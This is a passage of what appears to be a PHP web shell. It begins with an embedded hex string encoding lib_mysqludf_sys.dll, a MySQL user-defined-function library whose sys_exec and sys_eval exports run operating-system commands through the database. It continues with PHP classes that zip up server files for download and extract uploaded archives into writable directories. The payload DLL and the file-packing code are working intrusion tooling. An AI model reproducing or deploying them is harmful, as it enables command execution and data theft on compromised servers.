B80010000048F7D1488BD1488D79FF33C9FF158B1A0000488B56104C8BC7488B12488BC8488BD8FF15951B0000488D5424484C8D054100000048895424284C8BCB33C933D2C744242000000000FF155F1A000083CAFF488BC8FF153B1A0000488B5C2440488B74245033C04883C4305FC3CCCCCCCCCCCCCCCCCC4883EC28E817000000EB0033C04883C428C3CCCCCCCCCCCCCCCCCCCCCCCCCCCC55488BEC488B4510FF10C9C3CCCCCCCCCCCCCCCCCCCC66660F1F840000000000483B0DD9290000751148C1C11066F7C1FFFF7502F3C348C1C910E935040000CC40534883EC20B900010000FF15AF1A0000488BC8488BD8FF15AB1A0000488905642F0000488905552F00004885DB75058D4301EB2348832300E816060000488D0D47060000E8F2050000488D0D2F050000E8E605000033C04883C4205BC3CCCC488BC44889580848896810488978184C8960204155415641574883EC2033FF4D8BE04C8BE93BD70F85380100008B054D2900003BC70F8E23010000FFC8448BEF89053A29000065488B042530000000488B5808EB10483BC3741AB9E8030000FF158319000033C0F0480FB11DA82E000075E3EB0641BD010000008B05902E000083F802740FB91F000000E8AF060000E9A1010000488B0D8D2E0000FF156F1900004C8BE0483BC70F8496000000488B0D6C2E0000FF15561900004D8BFC4C8BF0488BE84883ED08493BEC725A48397D0074F1FF15701900004839450074E5488B4D00FF1528190000488BD8FF155719000048894500FFD3488B0D2A2E0000FF150C190000488B0D152E0000488BD8FF15FC1800004C3BFB75054C3BF074A54C8BFB4C8BE3EB97498BCCFF1581190000FF1513190000488905E42D0000488905E52D0000893DC72D0000443BEF0F85E300000048873DBF2D0000E9D700000033C0E9D500000083FA010F85C700000065488B0425300000008BEF488B5808EB10483BC3741AB9E8030000FF155918000033C0F0480FB11D7E2D000075E3EB05BD010000008B05672D00003BC7740CB91F000000E887050000EB3E488D1530190000488D0D19190000C7053F2D000001000000E8620500003BC77584488D15F7180000488D0DE8180000E845050000C705192D0000020000003BEF750A488BC7488705132D000048393D242D00007421488D0D1B2D0000E8D60400003BC774114D8BC4BA02000000498BCDFF15012D0000FF054B270000B801000000488B5C2440488B6C2448488B7C24504C8B6424584883C420415F415E415DC3CCCCCC488BC448895808488970104889781841544883EC30498BF08BFA4C8BE1BB010000008958E88915E926000085D275123915EF260000750A33DB8958E8E9CA00000083FA01740583FA027533488B054A1800004885C07408FFD08BD88944242085DB74134C8BC68BD7498BCCE834FDFFFF8BD88944242085DB0F848D0000004C8BC68BD7498BCCE8690400008BD88944242083FF01753585C075314C8BC633D2498BCCE84D0400004C8BC633D2498BCCE8F0FCFFFF4C8B1DE11700004D85DB740B4C8BC633D2498BCC41FFD385FF740583FF0375374C8BC68BD7498BCCE8C3FCFFFFF7D81BC923CB8BD9894C2420741C488B05A61700004885C074104C8BC68BD7498BCCFFD08BD889442420EB0633DB895C2420C705F7250000FFFFFFFF8BC3488B5C2440488B742448488B7C24504883C430415CC3CCCCCC48895C24084889742410574883EC20498BF88BDA488BF183FA017505E8BF0300004C8BC78BD3488BCE488B5C2430488B7424384883C4205FE98BFEFFFFCCCCCC48894C24084881EC88000000488D0D49260000FF15BB1500004C8B1D342700004C895C24584533C0488D542460488B4C2458E841040000488944245048837C245000744148C744243800000000488D4424484889442430488D4424404889442428488D05F425000048894424204C8B4C24504C8B442458488B54246033C9E8EF030000EB22488B842488000000488905C0260000488D8424880000004883C0084889054D260000488B05A626000048890517250000488B84249000000048890518260000C705EE240000090400C0C705E824000001000000488B05AD2400004889442468488B05A92400004889442470FF15F6140000890558250000B901000000E84E03000033C9FF15E6140000488D0D17160000FF15E1140000833D3225000000750AB901000000E826030000FF15D0140000BA090400C0488BC8FF15CA1400004881C488000000C3CCCC488D0DD9290000E90203000040534883EC20488BD9488B0DEC290000FF15CE14000048894424384883F8FF750B488BCBFF15EA140000EB7EB908000000E8DE02000090488B0DBE290000FF15A01400004889442438488B0DA4290000FF158E1400004889442440488BCBFF15D8140000488BC84C8D442440488D542438E898020000488BD8488B4C2438FF15B814000048890571290000488B4C2440FF15A614000048890557290000B908000000E861020000488BC34883C4205BC34883EC28E847FFFFFF48F7D81BC0F7D8FFC84883C428C3CC48895C2408574883EC20488D1D03160000488D3DFC150000EB0E488B034885C07402FFD04883C308483BDF72ED488B5C24304883C4205FC348895C2408574883EC20488D1DDB150000488D3DD4150000EB0E488B034885C07402FFD04883C308483BDF72ED488B5C24304883C4205FC3CCCCCCCCCCCCCCCCCCCCCCCC488BC1B94D5A0000663908740333C0C34863483C4803C833C0813950450000750CBA0B020000663951180F94C0F3C3CC4C63413C4533C94C8BD24C03C1410FB74014450FB758064A8D4C00184585DB741E8B510C4C3BD2720A8B410803C24C3BD0720F41FFC14883C128453BCB72E233C0C3488BC1C3CCCCCCCCCCCCCCCCCCCC4883EC284C8BC14C8D0D62E2FFFF498BC9E86AFFFFFF85C074224D2BC1498BD0498BC9E888FFFFFF4885C0740F8B4024C1E81FF7D083E001EB0233C04883C428C3CCFF2520130000FF2512130000FF25BC120000FF25BE120000FF25681300004883EC2883FA01751048833D97130000007506FF1537120000B8010000004883C428C3CC48895C2418574883EC20488B05DB21000048836424300048BF32A2DF2D992B0000483BC7740C48F7D0488905C4210000EB76488D4C2430FF153F120000488B5C2430FF15C4110000448BD84933DBFF15C0110000448BD84933DBFF15BC110000488D4C2438448BD84933DBFF15B31100004C8B5C24384C33DB48B8FFFFFFFFFFFF00004C23D848B833A2DF2D992B00004C3BDF4C0F44D84C891D4E21000049F7D34C891D4C210000488B5C24404883C4205FC3CCFF25EA110000FF25EC110000FF25EE110000FF25F0110000FF25F2110000FF256C110000FF255E110000CCCC40534883EC20458B18488BDA4C8BC94183E3F841F600044C8BD17413418B40084D635004F7D84C03D14863C84C23D14963C34A8B1410488B43108B480848034B08F641030F740C0FB6410383E0F048984C03C84C33CA498BC94883C4205BE9C9F6FFFFCC4883EC284D8B4138488BCA498BD1E889FFFFFFB8010000004883C428C3CCFF25E4110000CCCCCCCC40554883EC20488BEA488BD148894D28488B018B08894D24E84DFEFFFF4883C4205DC3CCCCCCCCCCCCCCCCCCCCCCCCCC40554883EC20488BEAC7054D200000FFFFFFFF4883C4205DC340554883EC20488BEAB908000000E8F8FEFFFF4883C4205DC3CCCCCCCCCCCCCCCCCCCCCCCCCCCC40554883EC20488BEA488B0133C98138050000C00F94C18BC18BC14883C4205DC3000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000F035000000000000063600000000000016360000000000003036000000000000C438000000000000AE380000000000009E380000000000008438000000000000683800000000000054380000000000003A3800000000000026380000000000001238000000000000F437000000000000D837000000000000C437000000000000B037000000000000A837000000000000DA3800000000000000000000000000000C370000000000001A37000000000000FA3600000000000044370000000000005A370000000000007E37000000000000883700000000000096370000000000009E37000000000000EA36000000000000DC36000000000000D036000000000000C236000000000000B0360000000000009A36000000000000903600000000000088360000000000007E3600000000000074360000000000006A36000000000000603600000000000056360000000000004E360000000000003237000000000000F43800000000000000000000000000000000000000000000000000000000000000000000000000004016008001000000000000000000000000000000000000003040008001000000D0400080010000004E6F20617267756D656E747320616C6C6F77656420287564663A206C69625F6D7973716C7564665F7379735F696E666F29000000000000006C69625F6D7973716C7564665F7379732076657273696F6E20302E302E33000045787065637465642065786163746C79206F6E6520737472696E67207479706520706172616D6574657200000000000045787065637465642065786163746C792074776F20617267756D656E74730000457870656374656420737472696E67207479706520666F72206E616D6520706172616D6574657200436F756C64206E6F7420616C6C6F63617465206D656D6F7279000000720000000000000000000000000000000000000000000000000000000000000000000000011D0C001DC40B001D740A001D5409001D3408001D3219F017E015D01915080015740A001564090015340800155211C0E41D00000200000027190000091A0000801F0000091A0000211900000F1A0000B01F000000000000010F06000F6407000F3406000F320B70010C02000C01110001060200063202501106020006320230E41D000001000000031C0000691C0000C91F0000000000000904010004420000E41D000001000000971D0000CA1D0000F01F0000CA1D00000104010004420000010A04000A3408000A3206700904010004420000E41D000001000000E4150000EB15000001000000EB150000010F06000F640A000F3408000F520B7021000000E01300000F14000004340000210000000F14000058140000F03300002108020008348C000F14000058140000F03300002108020008548E00E01300000F14000004340000192207001001860009E007D005C0037002600000581F000020040000010A04000A3406000A32067001310400317406000632023001060200063202308034000000000000000000004036000000300000203500000000000000000000A4360000A0300000000000000000000000000000000000000000000000000000F035000000000000063600000000000016360000000000003036000000000000C438000000000000AE380000000000009E380000000000008438000000000000683800000000000054380000000000003A3800000000000026380000000000001238000000000000F437000000000000D837000000000000C437000000000000B037000000000000A837000000000000DA3800000000000000000000000000000C370000000000001A37000000000000FA3600000000000044370000000000005A370000000000007E37000000000000883700000000000096370000000000009E37000000000000EA36000000000000DC36000000000000D036000000000000C236000000000000B0360000000000009A36000000000000903600000000000088360000000000007E3600000000000074360000000000006A36000000000000603600000000000056360000000000004E360000000000003237000000000000F4380000000000000000000000000000680457616974466F7253696E676C654F626A6563740058045669727475616C416C6C6F630000D503536574456E7669726F6E6D656E745661726961626C654100A30043726561746554687265616400004B45524E454C33322E646C6C0000AC04667265650000E7025F70636C6F736500E5046D616C6C6F630000EB025F706F70656E00003B0573797374656D00002B057374726E637079009B0466676574730006057265616C6C6F6300BC04676574656E7600004D5356435239302E646C6C0037015F656E636F64655F706F696E746572004E025F6D616C6C6F635F63727400CE015F696E69747465726D00CF015F696E69747465726D5F650038015F656E636F6465645F6E756C6C002D015F6465636F64655F706F696E74657200E2005F616D73675F65786974000059005F5F435F73706563696669635F68616E646C657200005A005F5F4370705863707446696C7465720083005F5F6372745F64656275676765725F686F6F6B007B005F5F636C65616E5F747970655F696E666F5F6E616D65735F696E7465726E616C0000A4035F756E6C6F636B0085005F5F646C6C6F6E65786974003D025F6C6F636B00E4025F6F6E65786974002504536C6565700031045465726D696E61746550726F636573730000AA0147657443757272656E7450726F63657373004204556E68616E646C6564457863657074696F6E46696C74657200001904536574556E68616E646C6564457863657074696F6E46696C74657200CB024973446562756767657250726573656E7400970352746C5669727475616C556E77696E640000900352746C4C6F6F6B757046756E6374696F6E456E7472790000890352746C43617074757265436F6E7465787400CC0044697361626C655468726561644C69627261727943616C6C73004E035175657279506572666F726D616E6365436F756E7465720066024765745469636B436F756E740000AE0147657443757272656E7454687265616449640000AB0147657443757272656E7450726F636573734964004F0247657453797374656D54696D65417346696C6554696D6500F0046D656D637079000000000000000070B1834B00000000DC3900000100000012000000120000002839000070390000B8390000601000003015000000100000401500003015000020150000E01300003015000050130000C013000030150000501300002011000030150000B0100000D0120000B012000080110000F1390000073A0000243A00003F3A00004B3A00005E3A00006F3A0000783A0000883A0000963A00009F3A0000AF3A0000BD3A0000C53A0000D43A0000E13A0000E93A0000F83A000000000100020003000400050006000700080009000A000B000C000D000E000F00100011006C69625F6D7973716C7564665F7379732E646C6C006C69625F6D7973716C7564665F7379735F696E666F006C69625F6D7973716C7564665F7379735F696E666F5F6465696E6974006C69625F6D7973716C7564665F7379735F696E666F5F696E6974007379735F62696E6576616C007379735F62696E6576616C5F6465696E6974007379735F62696E6576616C5F696E6974007379735F6576616C007379735F6576616C5F6465696E6974007379735F6576616C5F696E6974007379735F65786563007379735F657865635F6465696E6974007379735F657865635F696E6974007379735F676574007379735F6765745F6465696E6974007379735F6765745F696E6974007379735F736574007379735F7365745F6465696E6974007379735F7365745F696E697400000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000032A2DF2D992B0000CD5D20D266D4FFFFFFFFFFFFFFFFFFFF000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000020110000721100002C34000080110000AC12000020340000B0120000C812000078330000D01200004E13000018330000C0130000D813000078330000E01300000F140000043400000F14000058140000F033000058140000BE140000DC330000BE140000D4140000CC330000D41400001B150000BC33000040150000D7150000AC330000E0150000F21500008C330000401600009E16000038340000A0160000F9180000C0320000FC180000311A0000DC320000341A0000711A000018330000741A0000BE1B000028330000CC1B00007C1C0000383300007C1C0000931C000078330000941C0000CC1C000020340000CC1C0000041D000020340000901D0000D11D000058330000F01D0000131E000078330000141E0000C71E000080330000F41E0000571F000038340000581F0000751F000078330000801F0000A31F000030330000B01F0000C91F000030330000C91F0000E21F000030330000F01F0000112000003033000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000040000000000010018000000180000800000000000000000040000000000010002000000300000800000000000000000040000000000010009040000480000005860000058020000E4040000000000003C617373656D626C7920786D6C6E733D2275726E3A736368656D61732D6D6963726F736F66742D636F6D3A61736D2E763122206D616E696665737456657273696F6E3D22312E30223E0D0A20203C7472757374496E666F20786D6C6E733D2275726E3A736368656D61732D6D6963726F736F66742D636F6D3A61736D2E7633223E0D0A202020203C73656375726974793E0D0A2020202020203C72657175657374656450726976696C656765733E0D0A20202020202020203C726571756573746564457865637574696F6E4C6576656C206C6576656C3D226173496E766F6B6572222075694163636573733D2266616C7365223E3C2F726571756573746564457865637574696F6E4C6576656C3E0D0A2020202020203C2F72657175657374656450726976696C656765733E0D0A202020203C2F73656375726974793E0D0A20203C2F7472757374496E666F3E0D0A20203C646570656E64656E63793E0D0A202020203C646570656E64656E74417373656D626C793E0D0A2020202020203C617373656D626C794964656E7469747920747970653D2277696E333222206E616D653D224D6963726F736F66742E564339302E435254222076657273696F6E3D22392E302E32313032322E38222070726F636573736F724172636869746563747572653D22616D64363422207075626C69634B6579546F6B656E3D2231666338623362396131653138653362223E3C2F617373656D626C794964656E746974793E0D0A202020203C2F646570656E64656E74417373656D626C793E0D0A20203C2F646570656E64656E63793E0D0A3C2F617373656D626C793E50414444494E47585850414444494E4750414444494E47585850414444494E4750414444494E47585850414444494E4750414444494E47585850414444494E4750414444494E47585850414444494E4750414444494E47585850414444494E4750414444494E47585850414444494E4750414444494E47585850414444494E4750414444494E47585850414444494E4750414444494E47585850414444494E4750414444494E47585850414444494E4750414444494E47585850414444494E4750414444494E47585850414444494E4750414444494E47585850414444494E4750414444494E47585850414444494E4750414444494E47585850414444494E4750414444494E47585850414444494E4750414444494E47585850414444494E4750414444494E47585850414444494E4750414444494E47585850414444494E4750414444494E47585850414444494E47003000001000000088A1A0A1A8A1000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000";\r\n}\r\n\r\nclass eanver{\r\nvar $out=\'\';\r\nfunction eanver($dir){\r\n\tif(@function_exists(\'gzcompress\')){\r\n\tif(count($dir) > 0){\r\n\tforeach($dir as $file){\r\n\t\tif(is_file($file)){\r\n\t\t\t$filecode = file_get_contents($file);\r\n\t\t\tif(is_array($dir)) $file = basename($file);\r\n\t\t\t$this -> filezip($filecode,$file);\r\n\t\t}\r\n\t}\r\n\t$this->out = $this -> packfile();\r\n\t}\r\n\treturn true;\r\n\t}\r\n\telse return false;\r\n}\r\n\tvar $datasec      = array();\r\n\tvar $ctrl_dir     = array();\r\n\tvar $eof_ctrl_dir = "\\x50\\x4b\\x05\\x06\\x00\\x00\\x00\\x00";\r\n\tvar $old_offset   = 0;\r\n\tfunction at($atunix = 0) {\r\n\t\t$unixarr = ($atunix == 0) ? getdate() : getdate($atunix);\r\n\t\tif ($unixarr[\'year\'] < 1980) {\r\n\t\t\t$unixarr[\'year\']    = 1980;\r\n\t\t\t$unixarr[\'mon\']     = 1;\r\n\t\t\t$unixarr[\'mday\']    = 1;\r\n\t\t\t$unixarr[\'hours\']   = 0;\r\n\t\t\t$unixarr[\'minutes\'] = 0;\r\n\t\t\t$unixarr[\'seconds\'] = 0;\r\n\t\t} \r\n\t\treturn (($unixarr[\'year\'] - 1980) << 25) | ($unixarr[\'mon\'] << 21) | ($unixarr[\'mday\'] << 16) |\r\n\t\t\t\t($unixarr[\'hours\'] << 11) | ($unixarr[\'minutes\'] << 5) | ($unixarr[\'seconds\'] >> 1);\r\n\t}\r\n\tfunction filezip($data, $name, $time = 0) {\r\n\t\t$name = str_replace(\'\\\\\', \'/\', $name);\r\n\t\t$dtime = dechex($this->at($time));\r\n\t\t$hexdtime\t= \'\\x\' . $dtime[6] . $dtime[7]\r\n\t\t\t\t\t. \'\\x\' . $dtime[4] . $dtime[5]\r\n\t\t\t\t\t. \'\\x\' . $dtime[2] . $dtime[3]\r\n\t\t\t\t\t. \'\\x\' . $dtime[0] . $dtime[1];\r\n\t\teval(\'$hexdtime = "\' . $hexdtime . \'";\');\r\n\t\t$fr\t= "\\x50\\x4b\\x03\\x04";\r\n\t\t$fr\t.= "\\x14\\x00";\r\n\t\t$fr\t.= "\\x00\\x00";\r\n\t\t$fr\t.= "\\x08\\x00";\r\n\t\t$fr\t.= $hexdtime;\r\n\t\t$unc_len = strlen($data);\r\n\t\t$crc = crc32($data);\r\n\t\t$zdata = gzcompress($data);\r\n\t\t$c_len = strlen($zdata);\r\n\t\t$zdata = substr(substr($zdata, 0, strlen($zdata) - 4), 2);\r\n\t\t$fr .= pack(\'V\', $crc);\r\n\t\t$fr .= pack(\'V\', $c_len);\r\n\t\t$fr .= pack(\'V\', $unc_len);\r\n\t\t$fr .= pack(\'v\', strlen($name));\r\n\t\t$fr .= pack(\'v\', 0);\r\n\t\t$fr .= $name;\r\n\t\t$fr .= $zdata;\r\n\t\t$fr .= pack(\'V\', $crc);\r\n\t\t$fr .= pack(\'V\', $c_len);\r\n\t\t$fr .= pack(\'V\', $unc_len);\r\n\t\t$this -> datasec[] = $fr;\r\n\t\t$new_offset = strlen(implode(\'\', $this->datasec));\r\n\t\t$cdrec = "\\x50\\x4b\\x01\\x02";\r\n\t\t$cdrec .= "\\x00\\x00";\r\n\t\t$cdrec .= "\\x14\\x00";\r\n\t\t$cdrec .= "\\x00\\x00";\r\n\t\t$cdrec .= "\\x08\\x00";\r\n\t\t$cdrec .= $hexdtime;\r\n\t\t$cdrec .= pack(\'V\', $crc);\r\n\t\t$cdrec .= pack(\'V\', $c_len);\r\n\t\t$cdrec .= pack(\'V\', $unc_len);\r\n\t\t$cdrec .= pack(\'v\', strlen($name) );\r\n\t\t$cdrec .= pack(\'v\', 0 );\r\n\t\t$cdrec .= pack(\'v\', 0 );\r\n\t\t$cdrec .= pack(\'v\', 0 );\r\n\t\t$cdrec .= pack(\'v\', 0 );\r\n\t\t$cdrec .= pack(\'V\', 32 );\r\n\t\t$cdrec .= pack(\'V\', $this -> old_offset );\r\n\t\t$this -> old_offset = $new_offset;\r\n\t\t$cdrec .= $name;\r\n\t\t$this -> ctrl_dir[] = $cdrec;\r\n\t}\r\n\tfunction packfile(){\r\n\t\t$data    = implode(\'\', $this -> datasec);\r\n\t\t$ctrldir = implode(\'\', $this -> ctrl_dir);\r\n\t\treturn $data.$ctrldir.$this -> eof_ctrl_dir.pack(\'v\', sizeof($this -> ctrl_dir)).pack(\'v\', sizeof($this -> ctrl_dir)).pack(\'V\', strlen($ctrldir)).pack(\'V\', strlen($data))."\\x00\\x00";\r\n\t}\r\n}\r\n\r\nclass zip\r\n{\r\n\r\n var $total_files = 0;\r\n var $total_folders = 0; \r\n\r\n function Extract ( $zn, $to, $index = Array(-1) )\r\n {\r\n   $ok = 0; $zip = @fopen($zn,\'rb\');\r\n   if(!$zip) return(-1);\r\n   $cdir = $this->ReadCentralDir($zip,$zn);\r\n   $pos_entry = $cdir[\'offset\'];\r\n\r\n   if(!is_array($index)){ $index = array($index);  }\r\n   for($i=0; $index[$i];$i++){\r\n   \t\tif(intval($index[$i])!=$index[$i]||$index[$i]>$cdir[\'entries\'])\r\n\t\treturn(-1);\r\n   }\r\n   for ($i=0; $i<$cdir[\'entries\']; $i++)\r\n   {\r\n     @fseek($zip, $pos_entry);\r\n     $header = $this->ReadCentralFileHeaders($zip);\r\n     $header[\'index\'] = $i; $pos_entry = ftell($zip);\r\n     @rewind($zip); fseek($zip, $header[\'offset\']);\r\n     if(in_array("-1",$index)||in_array($i,$index))\r\n     \t$stat[$header[\'filename\']]=$this->ExtractFile($header, $to, $zip);\r\n   }\r\n   fclose($zip);\r\n   return $stat;\r\n }\r\n\r\n  function ReadFileHeader($zip)\r\n  {\r\n    $binary_data = fread($zip, 30);\r\n    $data = unpack(\'vchk/vid/vversion/vflag/vcompression/vmtime/vmdate/Vcrc/Vcompressed_size/Vsize/vfilename_len/vextra_len\', $binary_data);\r\n\r\n    $header[\'filename\'] = fread($zip, $data[\'filename_len\']);\r\n    if ($data[\'extra_len\'] != 0) {\r\n      $header[\'extra\'] = fread($zip, $data[\'extra_len\']);\r\n    } else { $header[\'extra\'] = \'\'; }\r\n\r\n    $header[\'compression\'] = $data[\'compression\'];$header[\'size\'] = $data[\'size\'];\r\n    $header[\'compressed_size\'] = $data[\'compressed_size\'];\r\n    $header[\'crc\'] = $data[\'crc\']; $header[\'flag\'] = $data[\'flag\'];\r\n    $header[\'mdate\'] = $data[\'mdate\'];$header[\'mtime\'] = $data[\'mtime\'];\r\n\r\n    if ($header[\'mdate\'] && $header[\'mtime\']){\r\n     $hour=($header[\'mtime\']&0xF800)>>11;$minute=($header[\'mtime\']&0x07E0)>>5;\r\n     $seconde=($header[\'mtime\']&0x001F)*2;$year=(($header[\'mdate\']&0xFE00)>>9)+1980;\r\n     $month=($header[\'mdate\']&0x01E0)>>5;$day=$header[\'mdate\']&0x001F;\r\n     $header[\'mtime\'] = mktime($hour, $minute, $seconde, $month, $day, $year);\r\n    }else{$header[\'mtime\'] = time();}\r\n\r\n    $header[\'stored_filename\'] = $header[\'filename\'];\r\n    $header[\'status\'] = "ok";\r\n    return $header;\r\n  }\r\n\r\n function ReadCentralFileHeaders($zip){\r\n    $binary_data = fread($zip, 46);\r\n    $header = unpack(\'vchkid/vid/vversion/vversion_extracted/vflag/vcompression/vmtime/vmdate/Vcrc/Vcompressed_size/Vsize/vfilename_len/vextra_len/vcomment_len/vdisk/vinternal/Vexternal/Voffset\', $binary_data);\r\n\r\n    if ($header[\'filename_len\'] != 0)\r\n      $header[\'filename\'] = fread($zip,$header[\'filename_len\']);\r\n    else $header[\'filename\'] = \'\';\r\n\r\n    if ($header[\'extra_len\'] != 0)\r\n      $header[\'extra\'] = fread($zip, $header[\'extra_len\']);\r\n    else $header[\'extra\'] = \'\';\r\n\r\n    if ($header[\'comment_len\'] != 0)\r\n      $header[\'comment\'] = fread($zip, $header[\'comment_len\']);\r\n    else $header[\'comment\'] = \'\';\r\n\r\n    if ($header[\'mdate\'] && $header[\'mtime\'])\r\n    {\r\n      $hour = ($header[\'mtime\'] & 0xF800) >> 11;\r\n      $minute = ($header[\'mtime\'] & 0x07E0) >> 5;\r\n      $seconde = ($header[\'mtime\'] & 0x001F)*2;\r\n      $year = (($header[\'mdate\'] & 0xFE00) >> 9) + 1980;\r\n      $month = ($header[\'mdate\'] & 0x01E0) >> 5;\r\n      $day = $header[\'mdate\'] & 0x001F;\r\n      $header[\'mtime\'] = mktime($hour, $minute, $seconde, $month, $day, $year);\r\n    } else {\r\n      $header[\'mtime\'] = time();\r\n    }\r\n    $header[\'stored_filename\'] = $header[\'filename\'];\r\n    $header[\'status\'] = \'ok\';\r\n    if (substr($header[\'filename\'], -1) == \'/\')\r\n      $header[\'external\'] = 0x41FF0010;\r\n    return $header;\r\n }\r\n\r\n function ReadCentralDir($zip,$zip_name){\r\n\t$size = filesize($zip_name);\r\n\r\n\tif ($size < 277) $maximum_size = $size;\r\n\telse $maximum_size=277;\r\n\t\r\n\t@fseek($zip, $size-$maximum_size);\r\n\t$pos = ftell($zip); $bytes = 0x00000000;\r\n\t\r\n\twhile ($pos < $size){\r\n\t\t$byte = @fread($zip, 1); $bytes=($bytes << 8) | ord($byte);\r\n\t\tif ($bytes == 0x504b0506 or $bytes == 0x2e706870504b0506){ $pos++;break;} $pos++;\r\n\t}\r\n\t\r\n\t$fdata=fread($zip,18);\r\n\t\r\n\t$data=@unpack(\'vdisk/vdisk_start/vdisk_entries/ventries/Vsize/Voffset/vcomment_size\',$fdata);\r\n\t\r\n\tif ($data[\'comment_size\'] != 0) $centd[\'comment\'] = fread($zip, $data[\'comment_size\']);\r\n\telse $centd[\'comment\'] = \'\'; $centd[\'entries\'] = $data[\'entries\'];\r\n\t$centd[\'disk_entries\'] = $data[\'disk_entries\'];\r\n\t$centd[\'offset\'] = $data[\'offset\'];$centd[\'disk_start\'] = $data[\'disk_start\'];\r\n\t$centd[\'size\'] = $data[\'size\'];  $centd[\'disk\'] = $data[\'disk\'];\r\n\treturn $centd;\r\n  }\r\n\r\n function ExtractFile($header,$to,$zip){\r\n\t$header = $this->readfileheader($zip);\r\n\t\r\n\tif(substr($to,-1)!="/") $to.="/";\r\n\tif($to==\'./\') $to = \'\';\t\r\n\t$pth = explode("/",$to.$header[\'filename\']);\r\n\t$mydir = \'\';\r\n\tfor($i=0;$i<count($pth)-1;$i++){\r\n\t\tif(!$pth[$i]) continue;\r\n\t\t$mydir .= $pth[$i]."/";\r\n\t\tif((!is_dir($mydir) && @mkdir($mydir,0777)) || (($mydir==$to.$header[\'filename\'] || ($mydir==$to && $this->total_folders==0)) && is_dir($mydir)) ){\r\n\t\t\t@chmod($mydir,0777);\r\n\t\t\t$this->total_folders ++;\r\n\t\t\techo "Ŀ¼: $mydir<br>";\r\n\t\t}\r\n\t}\r\n\t\r\n\tif(strrchr($header[\'filename\'],\'/\')==\'/\') return;\t\r\n\r\n\tif (!($header[\'external\']==0x41FF0010)&&!($header[\'external\']==16)){\r\n\t\tif ($header[\'compression\']==0){\r\n\t\t\t$fp = @fopen($to.$header[\'filename\'], \'wb\');\r\n\t\t\tif(!$fp) return(-1);\r\n\t\t\t$size = $header[\'compressed_size\'];\r\n\t\t\r\n\t\t\twhile ($size != 0){\r\n\t\t\t\t$read_size = ($size < 2048 ? $size : 2048);\r\n\t\t\t\t$buffer = fread($zip, $read_size);\r\n\t\t\t\t$binary_data = pack(\'a\'.$read_size, $buffer);\r\n\t\t\t\t@fwrite($fp, $binary_data, $read_size);\r\n\t\t\t\t$size -= $read_size;\r\n\t\t\t}\r\n\t\t\tfclose($fp);\r\n\t\t\ttouch($to.$header[\'filename\'], $header[\'mtime\']);\r\n\t\t}else{\r\n\t\t\t$fp = @fopen($to.$header[\'filename\'].\'.gz\',\'wb\');\r\n\t\t\tif(!$fp) return(-1);\r\n\t\t\t$binary_data = pack(\'va1a1Va1a1\', 0x8b1f, Chr($header[\'compression\']),\r\n\t\t\tChr(0x00), time(), Chr(0x00), Chr(3));\r\n\t\t\t\r\n\t\t\tfwrite($fp, $binary_data, 10);\r\n\t\t\t$size = $header[\'compressed_size\'];\r\n\t\t\r\n\t\t\twhile ($size != 0){\r\n\t\t\t\t$read_size = ($size < 1024 ? $size : 1024);\r\n\t\t\t\t$buffer = fread($zip, $read_size);\r\n\t\t\t\t$binary_data = pack(\'a\'.$read_size, $buffer);\r\n\t\t\t\t@fwrite($fp, $binary_data, $read_size);\r\n\t\t\t\t$size -= $read_size;\r\n\t\t\t}\r\n\t\t\r\n\t\t\t$binary_data = pack(\'VV\', $header[\'crc\'], $header[\'size\']);\r\n\t\t\tfwrite($fp, $binary_data,8); fclose($fp);\r\n\t\r\n\t\t\t$gzp = @gzopen($to.$header[\'filename\'].\'.gz\',\'rb\') or die("Cette archive est compress");\r\n\t\t\tif(!$gzp) return(-2);\r\n\t\t\t$fp = @fopen($to.$header[\'filename\'],\'wb\');\r\n\t\t\tif(!$fp) return(-1);\r\n\t\t\t$size = $header[\'size\'];\r\n\t\t\r\n\t\t\twhile ($size != 0){\r\n\t\t\t\t$read_size = ($size < 2048 ? $size : 2048);\r\n\t\t\t\t$buffer = gzread($gzp, $read_size);\r\n\t\t\t\t$binary_data = pack(\'a\'.$read_size, $buffer);\r\n\t\t\t\t@fwrite($fp, $binary_data, $read_size);\r\n\t\t\t\t$size -= $read_size;\r\n\t\t\t}\r\n\t\t\tfclose($fp); 